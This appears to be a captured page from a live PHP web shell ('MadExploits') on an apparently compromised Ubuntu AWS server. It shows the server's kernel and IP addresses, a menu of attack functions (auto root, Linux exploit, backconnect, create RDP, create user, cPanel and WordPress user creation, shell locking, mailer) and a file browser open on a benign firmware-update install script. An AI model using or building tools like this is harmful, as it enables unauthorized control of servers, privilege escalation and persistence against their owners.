Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.12.102.192
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
snap /
core /
16928 /
usr /
lib /
fwupdate /
[ HOME SHELL ]
Name
Size
Permission
Action
cleanup
665
B
-rwxr-xr-x
fwupx64.efi
64.08
KB
-rw-r--r--
fwupx64.efi.signed
65.95
KB
-rw-r--r--
install
1.28
KB
-rwxr-xr-x
version
13
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install
#!/bin/sh DISTRIBUTOR=ubuntu efi_vars_dir=/sys/firmware/efi/vars EFI_GLOBAL_VARIABLE=8be4df61-93ca-11d2-aa0d-00e098032b8c SB="$efi_vars_dir/SecureBoot-$EFI_GLOBAL_VARIABLE/data" #if we have SB enabled, don't bother to install the unsigned file if [ -e "$SB" ] && \ [ "$(( $(printf 0x%x \'"$(cat $SB | cut -b1)") & 1 ))" = 1 ]; then SECURE_BOOT="1" fi if [ ! -d "$efi_vars_dir" ]; then echo "System not running in EFI mode, not installing to EFI system partition." exit 0 fi for BINARY in $(find /usr/lib/fwupdate -name '*.efi' -printf "%f\n"); do ESP="/boot/efi/EFI/$DISTRIBUTOR" ESP_FILE="$ESP/$BINARY" SIGNED_FILE="/usr/lib/fwupdate/$BINARY.signed" UNSIGNED_FILE="/usr/lib/fwupdate/$BINARY" if [ -f "$ESP_FILE" ]; then ESP_MD5=$(md5sum $ESP_FILE | sed 's, .*,,') fi if [ -f "$SIGNED_FILE" ]; then COMPARE=$SIGNED_FILE elif [ -z "$SECURE_BOOT" ]; then COMPARE=$UNSIGNED_FILE fi mkdir -p $ESP/fw if [ -n "$COMPARE" ]; then COMPARE_MD5=$(md5sum $COMPARE | sed 's, .*,,') if [ "$COMPARE_MD5" != "$ESP_MD5" ]; then rm -f $ESP_FILE echo "Installing $BINARY to EFI system partition." cp $COMPARE $ESP_FILE fi else echo "Signed binary for $BINARY is not available, not installing binary to EFI system partition." fi done
Close